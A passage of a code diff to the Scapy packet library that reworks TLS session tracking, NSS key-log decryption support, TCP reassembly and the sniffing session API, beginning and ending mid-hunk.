TLS_Ext_SignatureAlgorithms): s.advertised_sig_algs = e.sig_algs @@ -1329,7 +1329,14 @@ def tls_session_update(self, msg_str): self.tls_session.session_hash = ( Hash_MD5().digest(to_hash) + Hash_SHA().digest(to_hash) ) - self.tls_session.compute_ms_and_derive_keys() + if self.tls_session.pre_master_secret: + self.tls_session.compute_ms_and_derive_keys() + + if not self.tls_session.master_secret: + # There are still no master secret (we're just passive) + if self.tls_session.use_nss_master_secret_if_present(): + # we have a NSS file + self.tls_session.compute_ms_and_derive_keys() ############################################################################### diff --git a/scapy/layers/tls/keyexchange.py b/scapy/layers/tls/keyexchange.py index dc6546d9919..cd81a20adaf 100644 --- a/scapy/layers/tls/keyexchange.py +++ b/scapy/layers/tls/keyexchange.py @@ -747,7 +747,7 @@ def fill_missing(self): if s.client_kx_privkey and s.server_kx_pubkey: pms = s.client_kx_privkey.exchange(s.server_kx_pubkey) s.pre_master_secret = pms.lstrip(b"\x00") - if not s.extms or s.session_hash: + if not s.extms: # If extms is set (extended master secret), the key will # need the session hash to be computed. This is provided # by the TLSClientKeyExchange. Same in all occurrences @@ -781,7 +781,7 @@ def post_dissection(self, m): if s.server_kx_privkey and s.client_kx_pubkey: ZZ = s.server_kx_privkey.exchange(s.client_kx_pubkey) s.pre_master_secret = ZZ.lstrip(b"\x00") - if not s.extms or s.session_hash: + if not s.extms: s.compute_ms_and_derive_keys() def guess_payload_class(self, p): @@ -828,7 +828,7 @@ def fill_missing(self): if s.client_kx_privkey and s.server_kx_pubkey: s.pre_master_secret = pms - if not s.extms or s.session_hash: + if not s.extms: s.compute_ms_and_derive_keys() def post_build(self, pkt, pay): @@ -854,7 +854,7 @@ def post_dissection(self, m): if s.server_kx_privkey and s.client_kx_pubkey: ZZ = s.server_kx_privkey.exchange(ec.ECDH(), s.client_kx_pubkey) s.pre_master_secret = ZZ - if not s.extms or s.session_hash: + if not s.extms: s.compute_ms_and_derive_keys() @@ -918,7 +918,7 @@ def pre_dissect(self, m): warning(err) s.pre_master_secret = pms - if not s.extms or s.session_hash: + if not s.extms: s.compute_ms_and_derive_keys() return pms @@ -934,7 +934,7 @@ def post_build(self, pkt, pay): s = self.tls_session s.pre_master_secret = enc - if not s.extms or s.session_hash: + if not s.extms: s.compute_ms_and_derive_keys() if s.server_tmp_rsa_key is not None: diff --git a/scapy/layers/tls/record.py b/scapy/layers/tls/record.py index c8e55a34757..e6c59456913 100644 --- a/scapy/layers/tls/record.py +++ b/scapy/layers/tls/record.py @@ -40,14 +40,6 @@ if conf.crypto_valid_advanced: from scapy.layers.tls.crypto.cipher_aead import Cipher_CHACHA20_POLY1305 -# Util - - -def _tls_version_check(version, min): - """Returns if version >= min, or False if version == None""" - if version is None: - return False - return version >= min ############################################################################### # TLS Record Protocol # @@ -216,7 +208,7 @@ def addfield(self, pkt, s, val): # Add TLS13ClientHello in case of HelloRetryRequest # Add ChangeCipherSpec for middlebox compatibility if (isinstance(pkt, _GenericTLSSessionInheritance) and - _tls_version_check(pkt.tls_session.tls_version, 0x0304) and + pkt.tls_session.tls_version == 0x0304 and not isinstance(pkt.msg[0], TLS13ServerHello) and not isinstance(pkt.msg[0], TLS13ClientHello) and not isinstance(pkt.msg[0], TLSChangeCipherSpec)): @@ -336,8 +328,14 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): return SSLv2 # Not SSLv2: continuation return _TLSEncryptedContent + if plen >= 5: + # Check minimum length + msglen = struct.unpack('!H', _pkt[3:5])[0] + 5 + if plen < msglen: + # This is a fragment + return conf.padding_layer # Check TLS 1.3 - if s and _tls_version_check(s.tls_version, 0x0304): + if s and s.tls_version == 0x0304: _has_cipher = lambda x: ( x and not isinstance(x.cipher, Cipher_NULL) ) @@ -575,12 +573,24 @@ def do_dissect_payload(self, s): as the TLS session to be used would get lost. """ if s: + # Check minimum length + if len(s) < 5: + p = conf.raw_layer(s, _internal=1, _underlayer=self) + self.add_payload(p) + return + msglen = struct.unpack('!H', s[3:5])[0] + 5 + if len(s) < msglen: + # This is a fragment + self.add_payload(conf.padding_layer(s)) + return try: p = TLS(s, _internal=1, _underlayer=self, tls_session=self.tls_session) except KeyboardInterrupt: raise except Exception: + if conf.debug_dissector: + raise p = conf.raw_layer(s, _internal=1, _underlayer=self) self.add_payload(p) @@ -734,11 +744,11 @@ def post_build(self, pkt, pay): return hdr + efrag + pay def mysummary(self): - s = super(TLS, self).mysummary() + s, n = super(TLS, self).mysummary() if self.msg: s += " / " s += " / ".join(getattr(x, "_name", x.name) for x in self.msg) - return s + return s, n ############################################################################### # TLS ChangeCipherSpec # diff --git a/scapy/layers/tls/record_sslv2.py b/scapy/layers/tls/record_sslv2.py index abe5004610a..8d311faaadc 100644 --- a/scapy/layers/tls/record_sslv2.py +++ b/scapy/layers/tls/record_sslv2.py @@ -141,7 +141,7 @@ def pre_dissect(self, s): is_mac_ok = self._sslv2_mac_verify(cfrag + pad, mac) if not is_mac_ok: pkt_info = self.firstlayer().summary() - log_runtime.info("TLS: record integrity check failed [%s]", pkt_info) # noqa: E501 + log_runtime.info("SSLv2: record integrity check failed [%s]", pkt_info) # noqa: E501 reconstructed_body = mac + cfrag + pad return hdr + reconstructed_body + r diff --git a/scapy/layers/tls/record_tls13.py b/scapy/layers/tls/record_tls13.py index b505bc8e20f..ff8f0acec4d 100644 --- a/scapy/layers/tls/record_tls13.py +++ b/scapy/layers/tls/record_tls13.py @@ -15,7 +15,6 @@ import struct -from scapy.config import conf from scapy.error import log_runtime, warning from scapy.compat import raw, orb from scapy.fields import ByteEnumField, PacketField, XStrField @@ -125,7 +124,7 @@ def _tls_auth_decrypt(self, s): return e.args except AEADTagError as e: pkt_info = self.firstlayer().summary() - log_runtime.info("TLS: record integrity check failed [%s]", pkt_info) # noqa: E501 + log_runtime.info("TLS 1.3: record integrity check failed [%s]", pkt_info) # noqa: E501 return e.args def pre_dissect(self, s): @@ -172,15 +171,7 @@ def do_dissect_payload(self, s): Note that overloading .guess_payload_class() would not be enough, as the TLS session to be used would get lost. """ - if s: - try: - p = TLS(s, _internal=1, _underlayer=self, - tls_session=self.tls_session) - except KeyboardInterrupt: - raise - except Exception: - p = conf.raw_layer(s, _internal=1, _underlayer=self) - self.add_payload(p) + return TLS.do_dissect_payload(self, s) # Building methods @@ -223,3 +214,10 @@ def post_build(self, pkt, pay): self.tls_session.triggered_pwcs_commit = False return hdr + frag + pay + + def mysummary(self): + s, n = super(TLS13, self).mysummary() + if self.inner and self.inner.msg: + s += " / " + s += " / ".join(getattr(x, "_name", x.name) for x in self.inner.msg) + return s, n diff --git a/scapy/layers/tls/session.py b/scapy/layers/tls/session.py index 8121bb24cfa..d78562508e7 100644 --- a/scapy/layers/tls/session.py +++ b/scapy/layers/tls/session.py @@ -10,6 +10,7 @@ """ import binascii +import collections import socket import struct @@ -18,7 +19,7 @@ from scapy.error import log_runtime, warning from scapy.packet import Packet from scapy.pton_ntop import inet_pton -from scapy.sessions import DefaultSession +from scapy.sessions import TCPSession from scapy.utils import repr_hex, strxor from scapy.layers.inet import TCP from scapy.layers.tls.crypto.compression import Comp_NULL @@ -34,7 +35,8 @@ def load_nss_keys(filename): """ Parses a NSS Keys log and returns unpacked keys in a dictionary. """ - keys = {} + # http://udn.realityripple.com/docs/Mozilla/Projects/NSS/Key_Log_Format + keys = collections.defaultdict(dict) try: fd = open(filename) fd.close() @@ -65,11 +67,10 @@ def load_nss_keys(filename): # Warn that a duplicated entry was detected. The latest one # will be kept in the resulting dictionary. - if data[0] in keys: + if client_random in keys[data[0]]: warning("Duplicated entry for %s !", data[0]) - keys[data[0]] = {"ClientRandom": client_random, - "Secret": secret} + keys[data[0]][client_random] = secret return keys @@ -368,6 +369,9 @@ def __init__(self, self.dport = dport self.sid = sid + # Identify duplicate sessions + self.firsttcp = None + # Our TCP socket. None until we send (or receive) a packet. self.sock = None @@ -529,6 +533,21 @@ def __setattr__(self, name, val): self.pwcs.connection_end = val super(tlsSession, self).__setattr__(name, val) + # Get infos from underlayer + + def set_underlayer(self, _underlayer): + if isinstance(_underlayer, TCP): + tcp = _underlayer + self.sport = tcp.sport + self.dport = tcp.dport + try: + self.ipsrc = tcp.underlayer.src + self.ipdst = tcp.underlayer.dst + except AttributeError: + pass + if self.firsttcp is None: + self.firsttcp = tcp.seq + # Mirroring def mirror(self): @@ -541,15 +560,15 @@ def mirror(self): client and the server. In such a situation, it should be used every time the message being read comes from a different side than the one read right before, as the reading state becomes the writing state, and - vice versa. For instance you could do: + vice versa. For instance you could do:: - client_hello = open('client_hello.raw').read() - + client_hello = open('client_hello.raw').read() + - m1 = TLS(client_hello) - m2 = TLS(server_hello, tls_session=m1.tls_session.mirror()) - m3 = TLS(server_cert, tls_session=m2.tls_session) - m4 = TLS(client_keyexchange, tls_session=m3.tls_session.mirror()) + m1 = TLS(client_hello) + m2 = TLS(server_hello, tls_session=m1.tls_session.mirror()) + m3 = TLS(server_cert, tls_session=m2.tls_session) + m4 = TLS(client_keyexchange, tls_session=m3.tls_session.mirror()) """ self.ipdst, self.ipsrc = self.ipsrc, self.ipdst @@ -598,12 +617,16 @@ def compute_master_secret(self): if conf.debug_tls: log_runtime.debug("TLS: master secret: %s", repr_hex(ms)) - def compute_ms_and_derive_keys(self): + def use_nss_master_secret_if_present(self) -> bool: # Load the master secret from an NSS Key dictionary - if self.nss_keys and self.nss_keys.get("CLIENT_RANDOM", False) and \ - self.nss_keys["CLIENT_RANDOM"].get("Secret", False): - self.master_secret = self.nss_keys["CLIENT_RANDOM"]["Secret"] + if not self.nss_keys or "CLIENT_RANDOM" not in self.nss_keys: + return False + if self.client_random in self.nss_keys["CLIENT_RANDOM"]: + self.master_secret = self.nss_keys["CLIENT_RANDOM"][self.client_random] + return True + return False + def compute_ms_and_derive_keys(self): if not self.master_secret: self.compute_master_secret() @@ -903,13 +926,20 @@ def eq(self, other): return False - def __repr__(self): + def repr(self, _underlayer=None): sid = repr(self.sid) if len(sid) > 12: sid = sid[:11] + "..." + if _underlayer and _underlayer.dport != self.dport: + return "%s:%s > %s:%s" % (self.ipdst, str(self.dport), + self.ipsrc, str(self.sport)) return "%s:%s > %s:%s" % (self.ipsrc, str(self.sport), self.ipdst, str(self.dport)) + def __repr__(self): + return self.repr() + + ############################################################################### # Session singleton # ############################################################################### @@ -946,14 +976,8 @@ def __init__(self, _pkt="", post_transform=None, _internal=0, self.wcs_snap_init = self.tls_session.wcs.snapshot() if isinstance(_underlayer, TCP): - tcp = _underlayer - self.tls_session.sport = tcp.sport - self.tls_session.dport = tcp.dport - try: - self.tls_session.ipsrc = tcp.underlayer.src - self.tls_session.ipdst = tcp.underlayer.dst - except AttributeError: - pass + # Get information from _underlayer + self.tls_session.set_underlayer(_underlayer) # Load a NSS Key Log file if conf.tls_nss_filename is not None: @@ -1079,25 +1103,52 @@ def show2(self): s.rcs = rcs_snap s.wcs = wcs_snap - def mysummary(self): - return "TLS %s / %s" % (repr(self.tls_session), - getattr(self, "_name", self.name)) + def mysummary(self, first=True): + from scapy.layers.tls.record import TLS + from scapy.layers.tls.record_tls13 import TLS13 + if ( + self.underlayer and + isinstance(self.underlayer, _GenericTLSSessionInheritance) + ): + summary = getattr(self, "_name", self.name) + else: + _underlayer = None + if self.underlayer and isinstance(self.underlayer, TCP): + _underlayer = self.underlayer + summary = "TLS %s / %s" % ( + self.tls_session.repr(_underlayer=_underlayer), + getattr(self, "_name", self.name) + ) + return summary, [TLS, TLS13] @classmethod def tcp_reassemble(cls, data, metadata, session): - # Used with TLSSession + # Used with TCPSession from scapy.layers.tls.record import TLS from scapy.layers.tls.record_tls13 import TLS13 if cls in (TLS, TLS13): length = struct.unpack("!H", data[3:5])[0] + 5 - if len(data) == length: - return cls(data) - elif len(data) > length: - pkt = cls(data) - if hasattr(pkt.payload, "tcp_reassemble"): - return pkt.payload.tcp_reassemble(data[length:], metadata, session) - else: - return pkt + if len(data) >= length: + # get the underlayer as it is used to populate tls_session + underlayer = metadata["original"][TCP].copy() + underlayer.remove_payload() + # eventually get the tls_session now for TLS.dispatch_hook + tls_session = None + if conf.tls_session_enable: + s = tlsSession() + s.set_underlayer(underlayer) + tls_session = conf.tls_sessions.find(s) + if tls_session: + if tls_session.dport != underlayer.dport: + tls_session = tls_session.mirror() + if tls_session.firsttcp == underlayer.seq: + log_runtime.info( + "TLS: session %s is a duplicate of a previous " + "dissection. Discard it" % repr(tls_session) + ) + conf.tls_sessions.rem(tls_session, force=True) + tls_session = None + return cls(data, _underlayer=underlayer, tls_session=tls_session) else: return cls(data) @@ -1123,11 +1174,12 @@ def add(self, session): else: self.sessions[h] = [session] - def rem(self, session): - s = self.find(session) - if s: - log_runtime.info("TLS: previous session shall not be overwritten") - return + def rem(self, session, force=False): + if not force: + s = self.find(session) + if s: + log_runtime.info("TLS: previous session shall not be overwritten") + return h = session.hash() self.sessions[h].remove(session) @@ -1140,10 +1192,10 @@ def find(self, session): if h in self.sessions: for k in self.sessions[h]: if k.eq(session): - if conf.tls_verbose: + if conf.debug_tls: log_runtime.info("TLS: found session matching %s", k) return k - if conf.tls_verbose: + if conf.debug_tls: log_runtime.info("TLS: did not find session matching %s", session) return None @@ -1162,8 +1214,13 @@ def __repr__(self): return "\n".join(map(lambda x: fmt % x, res)) -class TLSSession(DefaultSession): +class TLSSession(TCPSession): def __init__(self, *args, **kwargs): + # XXX this doesn't bring any value. + warning( + "TLSSession is deprecated and will be removed in a future version. " + "Please use TCPSession instead with conf.tls_session_enable=True" + ) server_rsa_key = kwargs.pop("server_rsa_key", None) super(TLSSession, self).__init__(*args, **kwargs) self._old_conf_status = conf.tls_session_enable @@ -1176,10 +1233,5 @@ def toPacketList(self): return super(TLSSession, self).toPacketList() +# Instantiate the TLS sessions holder conf.tls_sessions = _tls_sessions() -conf.tls_session_enable = False -conf.tls_verbose = False -# Filename containing NSS Keys Log -conf.tls_nss_filename = None -# Dictionary containing parsed NSS Keys -conf.tls_nss_keys = None diff --git a/scapy/libs/extcap.py b/scapy/libs/extcap.py index b61912e057a..be0e6b05663 100644 --- a/scapy/libs/extcap.py +++ b/scapy/libs/extcap.py @@ -158,8 +158,8 @@ def __init__(self, *_: Any, **kwarg: Any) -> None: self.reader = PcapReader(self.fd) # type: ignore self.ins = self.reader # type: ignore - def recv(self, x: int = MTU) -> Packet: - return self.reader.recv(x) + def recv(self, x: int = MTU, **kwargs: Any) -> Packet: + return self.reader.recv(x, **kwargs) def close(self) -> None: self.proc.kill() diff --git a/scapy/packet.py b/scapy/packet.py index e35b1bfc45a..4074d12789f 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -88,6 +88,7 @@ class Packet( "packetfields", "original", "explicit", "raw_packet_cache", "raw_packet_cache_fields", "_pkt", "post_transforms", + "stop_dissection_after", # then payload, underlayer and parent "payload", "underlayer", "parent", "name", @@ -146,6 +147,7 @@ def __init__(self, _internal=0, # type: int _underlayer=None, # type: Optional[Packet] _parent=None, # type: Optional[Packet] + stop_dissection_after=None, # type: Optional[Type[Packet]] **fields # type: Any ): # type: (...) -> None @@ -174,6 +176,7 @@ def __init__(self, self.direction = None # type: Optional[int] self.sniffed_on = None # type: Optional[_GlobInterfaceType] self.comment = None # type: Optional[bytes] + self.stop_dissection_after = stop_dissection_after if _pkt: self.dissect(_pkt) if not _internal: @@ -1033,9 +1036,22 @@ def do_dissect_payload(self, s): :param str s: the raw layer """ if s: + if ( + self.stop_dissection_after and + isinstance(self, self.stop_dissection_after) + ): + # stop dissection here + p = conf.raw_layer(s, _internal=1, _underlayer=self) + self.add_payload(p) + return cls = self.guess_payload_class(s) try: - p = cls(s, _internal=1, _underlayer=self) + p = cls( + s, + stop_dissection_after=self.stop_dissection_after, + _internal=1, + _underlayer=self, + ) except KeyboardInterrupt: raise except Exception: diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 85136ab18a5..a994d0399b3 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -1092,20 +1092,17 @@ def _run(self, iface=None, # type: Optional[_GlobInterfaceType] started_callback=None, # type: Optional[Callable[[], Any]] session=None, # type: Optional[_GlobSessionType] - session_kwargs={}, # type: Dict[str, Any] **karg # type: Any ): # type: (...) -> None self.running = True + self.count = 0 + lst = [] # Start main thread # instantiate session if not isinstance(session, DefaultSession): session = session or DefaultSession - session = session(prn=prn, store=store, - **session_kwargs) - else: - session.prn = prn - session.store = store + session = session() # sniff_sockets follows: {socket: label} sniff_sockets = {} # type: Dict[SuperSocket, _GlobInterfaceType] if opened_socket is not None: @@ -1238,8 +1235,28 @@ def stop_cb(): for s in sockets: if s is close_pipe: # type: ignore break + # The session object is passed the socket to call recv() on, + # and may perform additional processing (ip defrag, etc.) try: - p = s.recv() + packets = session.recv(s) + # A session can return multiple objects + for p in packets: + if lfilter and not lfilter(p): + continue + p.sniffed_on = sniff_sockets[s] + # post-processing + self.count += 1 + if store: + lst.append(p) + if prn: + result = prn(p) + if result is not None: + print(result) + # check + if (stop_filter and stop_filter(p)) or \ + (0 < count <= self.count): + self.continue_sniff = False + break except EOFError: # End of stream try: @@ -1262,18 +1279,6 @@ def stop_cb(): if conf.debug_dissector >= 2: raise continue - if p is None: - continue - if lfilter and not lfilter(p): - continue - p.sniffed_on = sniff_sockets[s] - # on_packet_received handles the prn/storage - session.on_packet_received(p) - # check - if (stop_filter and stop_filter(p)) or \ - (0 < count <= session.count): - self.continue_sniff = False - break # Removed dead sockets for s in dead_sockets: del sniff_sockets[s] @@ -1289,7 +1294,7 @@ def stop_cb(): s.close() elif close_pipe: close_pipe.close() - self.results = session.toPacketList() + self.results = PacketList(lst, "Sniffed") def start(self): # type: () -> None diff --git a/scapy/sessions.py b/scapy/sessions.py index 8317204060f..72856484564 100644 --- a/scapy/sessions.py +++ b/scapy/sessions.py @@ -10,105 +10,55 @@ import socket import struct -from scapy.compat import raw, orb +from scapy.compat import orb from scapy.config import conf from scapy.packet import NoPayload, Packet -from scapy.plist import PacketList from scapy.pton_ntop import inet_pton # Typing imports from typing import ( Any, - Callable, DefaultDict, Dict, + Iterator, List, Optional, Tuple, - cast + cast, + TYPE_CHECKING, ) +from scapy.compat import Self +if TYPE_CHECKING: + from scapy.supersocket import SuperSocket class DefaultSession(object): """Default session: no stream decoding""" - def __init__( - self, - prn=None, # type: Optional[Callable[[Packet], Any]] - store=False, # type: bool - supersession=None, # type: Optional[DefaultSession] - *args, # type: Any - **karg # type: Any - ): - # type: (...) -> None - self.__prn = prn - self.__store = store - self.lst = [] # type: List[Packet] - self.__count = 0 - self._supersession = supersession - if self._supersession: - self._supersession.prn = self.__prn - self._supersession.store = self.__store - self.__store = False - self.__prn = None - - @property - def store(self): - # type: () -> bool - return self.__store - - @store.setter - def store(self, val): - # type: (bool) -> None - if self._supersession: - self._supersession.store = val - else: - self.__store = val - - @property - def prn(self): - # type: () -> Optional[Callable[[Packet], Any]] - return self.__prn - - @prn.setter - def prn(self, f): - # type: (Optional[Any]) -> None - if self._supersession: - self._supersession.prn = f - else: - self.__prn = f + def __init__(self, supersession: Optional[Self] = None): + if supersession and not isinstance(supersession, DefaultSession): + supersession = supersession() + self.supersession = supersession - @property - def count(self): - # type: () -> int - if self._supersession: - return self._supersession.count - else: - return self.__count - - def toPacketList(self): - # type: () -> PacketList - if self._supersession: - return PacketList(self._supersession.lst, "Sniffed") - else: - return PacketList(self.lst, "Sniffed") + def process(self, pkt: Packet) -> Optional[Packet]: + """ + Called to pre-process the packet + """ + # Optionally handle supersession + if self.supersession: + return self.supersession.process(pkt) + return pkt - def on_packet_received(self, pkt): - # type: (Optional[Packet]) -> None - """DEV: entry point. Will be called by sniff() for each - received packet (that passes the filters). + def recv(self, sock: 'SuperSocket') -> Iterator[Packet]: """ + Will be called by sniff() to ask for a packet + """ + pkt = sock.recv() if not pkt: return - if not isinstance(pkt, Packet): - raise TypeError("Only provide a Packet.") - self.__count += 1 - if self.store: - self.lst.append(pkt) - if self.prn: - result = self.prn(pkt) - if result is not None: - print(result) + pkt = self.process(pkt) + if pkt: + yield pkt class IPSession(DefaultSession): @@ -123,39 +73,11 @@ def __init__(self, *args, **kwargs): DefaultSession.__init__(self, *args, **kwargs) self.fragments = defaultdict(list) # type: DefaultDict[Tuple[Any, ...], List[Packet]] # noqa: E501 - def _ip_process_packet(self, packet): - # type: (Packet) -> Optional[Packet] - from scapy.layers.inet import _defrag_list, IP + def process(self, packet: Packet) -> Optional[Packet]: + from scapy.layers.inet import IP, _defrag_ip_pkt if IP not in packet: return packet - ip = packet[IP] - packet._defrag_pos = 0 - if ip.frag != 0 or ip.flags.MF: - uniq = (ip.id, ip.src, ip.dst, ip.proto) - self.fragments[uniq].append(packet) - if not ip.flags.MF: # end of frag - try: - if self.fragments[uniq][0].frag == 0: - # Has first fragment (otherwise ignore) - defrag = [] # type: List[Packet] - _defrag_list(self.fragments[uniq], defrag, []) - defragmented_packet = defrag[0] - defragmented_packet = defragmented_packet.__class__( - raw(defragmented_packet) - ) - defragmented_packet.time = packet.time - return defragmented_packet - finally: - del self.fragments[uniq] - return None - else: - return packet - - def on_packet_received(self, pkt): - # type: (Optional[Packet]) -> None - if not pkt: - return None - super(IPSession, self).on_packet_received(self._ip_process_packet(pkt)) + return _defrag_ip_pkt(packet, self.fragments)[1] # type: ignore class StringBuffer(object): @@ -174,16 +96,26 @@ def __init__(self): # type: () -> None self.content = bytearray(b"") self.content_len = 0 + self.noff = 0 # negative offset self.incomplete = [] # type: List[Tuple[int, int]] - def append(self, data, seq): - # type: (bytes, int) -> None + def append(self, data: bytes, seq: Optional[int] = None) -> None: data_len = len(data) - seq = seq - 1 + if seq is None: + seq = self.content_len + seq = seq - 1 - self.noff + if seq < 0: + # Data is located before the start of the current buffer + # (e.g. the first fragment was missing) + self.content = bytearray(b"\x00" * (-seq)) + self.content + self.content_len += (-seq) + self.noff += seq + seq = 0 if seq + data_len > self.content_len: + # Data is located after the end of the current buffer self.content += b"\x00" * (seq - self.content_len + data_len) - # If data was missing, mark it. - self.incomplete.append((self.content_len, seq)) + # As data was missing, mark it. + # self.incomplete.append((self.content_len, seq)) self.content_len = seq + data_len assert len(self.content) == self.content_len # XXX removes empty space marker. @@ -192,6 +124,10 @@ def append(self, data, seq): # self.incomplete.remove([???]) memoryview(self.content)[seq:seq + data_len] = data + def shiftleft(self, i: int) -> None: + self.content = self.content[i:] + self.content_len -= i + def full(self): # type: () -> bool # Should only be true when all missing data was filled up, @@ -254,7 +190,7 @@ def __init__(self, app=False, *args, **kwargs): super(TCPSession, self).__init__(*args, **kwargs) self.app = app if app: - self.data = b"" + self.data = StringBuffer() self.metadata = {} # type: Dict[str, Any] self.session = {} # type: Dict[str, Any] else: @@ -266,6 +202,9 @@ def __init__(self, app=False, *args, **kwargs): self.tcp_sessions = defaultdict( dict ) # type: DefaultDict[bytes, Dict[str, Any]] + # Setup stopping dissection condition + from scapy.layers.inet import TCP + self.stop_dissection_after = TCP def _get_ident(self, pkt, session=False): # type: (Packet, bool) -> bytes @@ -283,28 +222,50 @@ def xor(x, y): # Uni-directional return src + dst + struct.pack("!HH", pkt.dport, pkt.sport) - def _process_packet(self, pkt): - # type: (Packet) -> Optional[Packet] + def _strip_padding(self, pkt: Packet) -> Optional[bytes]: + """Strip the packet of any padding, and return the padding. + """ + pad = pkt.getlayer(conf.padding_layer) + if pad is not None and pad.underlayer is not None: + # strip padding + del pad.underlayer.payload + return cast(bytes, pad.load) + return None + + def process(self, pkt: Packet) -> Optional[Packet]: """Process each packet: matches the TCP seq/ack numbers to follow the TCP streams, and orders the fragments. """ + _pkt = super(TCPSession, self).process(pkt) + if pkt is None: + return None + else: # Python 3.8 := would be nice + pkt = cast(Packet, _pkt) + packet = None # type: Optional[Packet] if self.app: # Special mode: Application layer. Use on top of TCP pay_class = pkt.__class__ - if not hasattr(pay_class, "tcp_reassemble"): - # Being on top of TCP, we have no way of knowing - # when a packet ends. - return pkt - self.data += bytes(pkt) - pkt = pay_class.tcp_reassemble( - self.data, + if hasattr(pay_class, "tcp_reassemble"): + tcp_reassemble = pay_class.tcp_reassemble + else: + # There is no tcp_reassemble. Just dissect the packet + tcp_reassemble = lambda data, *_: pay_class(data) + self.data.append(bytes(pkt)) + packet = tcp_reassemble( + bytes(self.data), self.metadata, self.session ) - if pkt: - self.data = b"" - self.metadata = {} - return pkt + if packet: + padding = self._strip_padding(packet) + if padding: + # There is remaining data for the next payload. + self.data.shiftleft(len(self.data) - len(padding)) + else: + # No padding (data) left. Clear + self.data.clear() + self.metadata.clear() + return packet return None from scapy.layers.inet import IP, TCP @@ -321,13 +282,12 @@ def _process_packet(self, pkt): tcp_session = self.tcp_sessions[self._get_ident(pkt, True)] # Let's guess which class is going to be used if "pay_class" not in metadata: - pay_class = pay.__class__ + pay_class = pkt[TCP].guess_payload_class(new_data) if hasattr(pay_class, "tcp_reassemble"): tcp_reassemble = pay_class.tcp_reassemble else: - # We can't know for sure when a packet ends. - # Ignore. - return pkt + # There is no tcp_reassemble. Just dissect the packet + tcp_reassemble = lambda data, *_: pay_class(data) metadata["pay_class"] = pay_class metadata["tcp_reassemble"] = tcp_reassemble else: @@ -352,9 +312,9 @@ def _process_packet(self, pkt): metadata["tcp_psh"] = True # XXX TODO: check that no empty space is missing in the buffer. # XXX Currently, if a TCP fragment was missing, we won't notice it. - packet = None # type: Optional[Packet] if data.full(): # Reassemble using all previous packets + metadata["original"] = pkt packet = tcp_reassemble( bytes(data), metadata, @@ -364,11 +324,19 @@ def _process_packet(self, pkt): if packet: if "seq" in metadata: pkt[TCP].seq = metadata["seq"] - # Clear buffer - data.clear() # Clear TCP reassembly metadata metadata.clear() - del self.tcp_frags[ident] + # Check for padding + padding = self._strip_padding(packet) + if padding: + # There is remaining data for the next payload. + full_length = data.content_len - len(padding) + metadata["relative_seq"] = relative_seq + full_length + data.shiftleft(full_length) + else: + # No padding (data) left. Clear + data.clear() + del self.tcp_frags[ident] # Rebuild resulting packet pay.underlayer.remove_payload() if IP in pkt: @@ -379,18 +347,14 @@ def _process_packet(self, pkt): return pkt return None - def on_packet_received(self, pkt): - # type: (Optional[Packet]) -> None - """Hook to the Sessions API: entry point of the dissection. - This will defragment IP if necessary, then process to - TCP reassembly. + def recv(self, sock: 'SuperSocket') -> Iterator[Packet]: """ - if not pkt: - return None - # First, defragment IP if necessary - pkt = self._ip_process_packet(pkt) + Will be called by sniff() to ask for a packet + """ + pkt = sock.recv(stop_dissection_after=self.stop_dissection_after) if not pkt: return None # Now handle TCP reassembly - pkt = self._process_packet(pkt) - DefaultSession.on_packet_received(self, pkt) + pkt = self.process(pkt) + if pkt: + yield pkt diff --git a/scapy/supersocket.py b/scapy/supersocket.py index 8afec10b173..06f7019a78f 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -175,13 +175,13 @@ def recv_raw(self, x=MTU): """Returns a tuple containing (cls, pkt_data, time)""" return conf.raw_layer, self.ins.recv(x), None - def recv(self, x=MTU): - # type: (int) -> Optional[Packet] + def recv(self, x=MTU, **kwargs): + # type: (int, **Any) -> Optional[Packet] cls, val, ts = self.recv_raw(x) if not val or not cls: return None try: - pkt = cls(val) # type: Packet + pkt = cls(val, **kwargs) # type: Packet except KeyboardInterrupt: raise except Exception: @@ -321,8 +321,8 @@ def __init__(self, msg = "Your Linux Kernel does not support Auxiliary Data!" log_runtime.info(msg) - def recv(self, x=MTU): - # type: (int) -> Optional[Packet] + def recv(self, x=MTU, **kwargs): + # type: (int, **Any) -> Optional[Packet] data, sa_ll, ts = self._recv_raw(self.ins, x) if sa_ll[2] == socket.PACKET_OUTGOING: return None @@ -338,7 +338,7 @@ def recv(self, x=MTU): lvl = 3 try: - pkt = cls(data) + pkt = cls(data, **kwargs) except KeyboardInterrupt: raise except Exception: @@ -418,13 +418,13 @@ def __init__(self, sock, basecls=None): SimpleSocket.__init__(self, sock) self.basecls = basecls - def recv(self, x=MTU): - # type: (int) -> Optional[Packet] + def recv(self, x=MTU, **kwargs): + # type: (int, **Any) -> Optional[Packet] data = self.ins.recv(x, socket.MSG_PEEK) x = len(data) if x == 0: return None - pkt = self.basecls(data) # type: Packet + pkt = self.basecls(data, **kwargs) # type: Packet pad = pkt.getlayer(conf.padding_layer) if pad is not None and pad.underlayer is not None: del pad.underlayer.payload @@ -445,12 +445,12 @@ def __init__(self, sock, basecls=None): super(SSLStreamSocket, self).__init__(sock, basecls) # 65535, the default value of x is the maximum length of a TLS record - def recv(self, x=65535): - # type: (int) -> Optional[Packet] + def recv(self, x=65535, **kwargs): + # type: (int, **Any) -> Optional[Packet] pkt = None # type: Optional[Packet] if self._buf != b"": try: - pkt = self.basecls(self._buf) + pkt = self.basecls(self._buf, **kwargs) except Exception: # We assume that the exception is generated by a buffer underflow # noqa: E501 pass @@ -462,7 +462,7 @@ def recv(self, x=65535): self._buf += buf x = len(self._buf) - pkt = self.basecls(self._buf) + pkt = self.basecls(self._buf, **kwargs) if pkt is not None: pad = pkt.getlayer(conf.padding_layer) @@ -511,9 +511,9 @@ def __init__(self, self.reader = PcapReader(self.tcpdump_proc.stdout) self.ins = self.reader # type: ignore - def recv(self, x=MTU): - # type: (int) -> Optional[Packet] - return self.reader.recv(x) + def recv(self, x=MTU, **kwargs): + # type: (int, **Any) -> Optional[Packet] + return self.reader.recv(x, **kwargs) def close(self): # type: () -> None @@ -562,11 +562,11 @@ def select(sockets, remain=None): # type: (List[SuperSocket], Any) -> List[SuperSocket] return sockets - def recv(self, *args): - # type: (*Any) -> Optional[Packet] + def recv(self, x=None, **kwargs): + # type: (Optional[int], Any) -> Optional[Packet] try: pkt = next(self.iter) - return pkt.__class__(bytes(pkt)) + return pkt.__class__(bytes(pkt), 